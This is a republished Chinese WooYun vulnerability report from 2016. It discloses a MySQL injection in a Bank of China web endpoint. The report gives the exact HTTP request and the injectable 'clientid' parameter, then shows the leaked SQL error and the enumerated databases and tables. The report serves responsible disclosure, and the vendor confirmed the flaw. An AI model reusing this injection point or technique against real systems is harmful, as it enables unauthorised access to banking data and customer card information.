中国银行某站MySQL注射(涉及管理员密码/大量用户卡号信息)

admin
admin
admin
141216
文章
117
评论
2017年4月30日03:26:44评论291 views字数 235阅读0分47秒阅读模式
摘要

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

漏洞概要 关注数(17) 关注此漏洞

缺陷编号: WooYun-2016-205199

漏洞标题: 中国银行某站MySQL注射(涉及管理员密码/大量用户卡号信息)

相关厂商: 中国银行

漏洞作者: Aasron

提交时间: 2016-05-05 10:24

公开时间: 2016-06-19 22:10

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+字符类型注射 Mysql 注射技巧

2人收藏

漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

简要描述:

中国银行某站MySQL注射(涉及管理员密码/百万用户信息)

详细说明:

code 区域 
PUT /interFace/getAppUpdate.php HTTP/1.1
 Host: open.boc.cn
 Content-Type: application/json
 Connection: close
 Accept: application/json
 User-Agent: ESchool/1.1 CFNetwork/758.3.15 Darwin/15.4.0
 Accept-Language: zh-cn
 Accept-Encoding: gzip, deflate
 Content-Length: 29
 
 {"clientid":"399","type":"1"}
code 区域 
注入参数#clientid

正常返回内容

code 区域 
{"clientkey":"399","version":"1.0.2","appversion":"177","appurl":"http:////open.boc.cn//apps//appdownload//41295","need_update":"0","new_function":"","appfilesize":"","incrementSize":""}

报错

code 区域 
<b>MySQL server error report:Array
 (
     [0] => Array
         (
             [message] => MySQL Query Error
         )
 
     [1] => Array
         (
             [sql] => SELECT goods_name,ios_file,app_version,goods_id,client_key as clientkey,need_update,new_function,category_ver as appversion FROM `ec`.`aps_goods`  where  client_key=399'
         )
 
     [2] => Array
         (
             [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
         )
 
     [3] => Array
         (
             [errno] => 1064
         )
 
 )

漏洞证明:

code 区域 
available databases [11]:
 [*] bim
 [*] container
 [*] ec
 [*] ezcis
 [*] information_schema
 [*] mysql
 [*] ndbinfo
 [*] performance_schema
 [*] sap
 [*] test
 [*] ultrax
code 区域 
当前数据库:ec
code 区域 
+-------------------------------+
 | aps_account_log               |
 | aps_ad                        |
 | aps_ad_custom                 |
 | aps_ad_position               |
 | aps_admin_action              |
 | aps_admin_log                 |
 | aps_admin_message             |
 | aps_admin_user                |
 | aps_adsense                   |
 | aps_affiliate_log             |
 | aps_agency                    |
 | aps_apps                      |
 | aps_apps_bak150321            |
 | aps_apps_bak151205            |
 | aps_apps_cat                  |
 | aps_apps_relation             |
 | aps_area_region               |
 | aps_article                   |
 | aps_article_cat               |
 | aps_article_cat_bak           |
 | aps_article_comment           |
 | aps_attribute                 |
 | aps_auction_log               |
 | aps_auto_manage               |
 | aps_back_goods                |
 | aps_back_order                |
 | aps_bank_info                 |
 | aps_banner                    |
 | aps_bonus_type                |
 | aps_booking_goods             |
 | aps_brand                     |
 | aps_card                      |
 | aps_card_trans_audit          |
 | aps_cart                      |
 | aps_cat_recommend             |
 | aps_category                  |
 | aps_collect_goods             |
 | aps_comment                   |
 | aps_crons                     |
 | aps_custom_pads               |
 | aps_customs                   |
 | aps_dcode                     |
 | aps_delivery_goods            |
 | aps_delivery_order            |
 | aps_dic_h5_interface          |
 | aps_dic_paper_category        |
 | aps_dic_site_letter           |
 | aps_download_log              |
 | aps_email_list                |
 | aps_email_sendlist            |
 | aps_error_log                 |
 | aps_exchange_goods            |
 | aps_failedlogin               |
 | aps_favourable_activity       |
 | aps_feedback                  |
 | aps_friend_link               |
 | aps_general_bank              |
 | aps_general_interface         |
 | aps_goods                     |
 | aps_goods_20141206            |
 | aps_goods_activity            |
 | aps_goods_article             |
 | aps_goods_attr                |
 | aps_goods_bak150321           |
 | aps_goods_bak151205           |
 | aps_goods_cat                 |
 | aps_goods_gallery             |
 | aps_goods_interface           |
 | aps_goods_interface_bak151205 |
 | aps_goods_relation            |
 | aps_goods_type                |
 | aps_goods_whites              |
 | aps_group_goods               |
 | aps_interface                 |
 | aps_interface0321             |
 | aps_keywords                  |
 | aps_link_goods                |
 | aps_log_conf                  |
 | aps_log_data                  |
 | aps_log_goods_download        |
 | aps_mail_templates            |
 | aps_manage_ip                 |
 | aps_match_goods               |
 | aps_matchor                   |
 | aps_member_price              |
 | aps_nav                       |
 | aps_order_action              |
 | aps_order_goods               |
 | aps_order_info                |
 | aps_pack                      |
 | aps_package_goods             |
 | aps_para_info                 |
 | aps_para_type                 |
 | aps_pay_log                   |
 | aps_payment                   |
 | aps_plugins                   |
 | aps_poster                    |
 | aps_poster_copy               |
 | aps_products                  |
 | aps_reg_extend_info           |
 | aps_reg_fields                |
 | aps_region                    |
 | aps_role                      |
 | aps_searchengine              |
 | aps_sessions                  |
 | aps_sessions_data             |
 | aps_shipping                  |
 | aps_shipping_area             |
 | aps_shop_config               |
 | aps_snatch_log                |
 | aps_special_url               |
 | aps_stats                     |
 | aps_suppliers                 |
 | aps_tag                       |
 | aps_template                  |
 | aps_topic                     |
 | aps_user_account              |
 | aps_user_address              |
 | aps_user_app                  |
 | aps_user_bonus                |
 | aps_user_feed                 |
 | aps_user_pictures             |
 | aps_user_pictures_copy        |
 | aps_user_rank                 |
 | aps_user_test_account         |
 | aps_user_test_card            |
 | aps_user_trans_audit          |
 | aps_users                     |
 | aps_users_bak                 |
 | aps_users_bak150321           |
 | aps_users_bak150321_copy      |
 | aps_users_copy                |
 | aps_validate_code             |
 | aps_validate_code_copy        |
 | aps_virtual_card              |
 | aps_volume_price              |
 | aps_vote                      |
 | aps_vote_log                  |
 | aps_vote_option               |
 | aps_wholesale                 |
 +-------------------------------+

中国银行某站MySQL注射(涉及管理员密码/大量用户卡号信息)

保证用户安全,不深入测试

修复方案:

过滤神马的

版权声明:转载请注明来源 Aasron@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-05 22:07

厂商回复:

感谢白帽子

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-05-05 10:37 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习,多挖洞!)

    1

    大牛,收徒弟吗?

  2. 2016-05-05 10:59 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    0

    银行。。。

  3. 2016-05-05 11:25 | 开心一下1313 ( 实习白帽子 | Rank:77 漏洞数:27 | 喝口水,压压惊......)

    0

    有钱

  4. 2016-05-06 08:17 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    0

    看来表哥的神器已经写好了。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin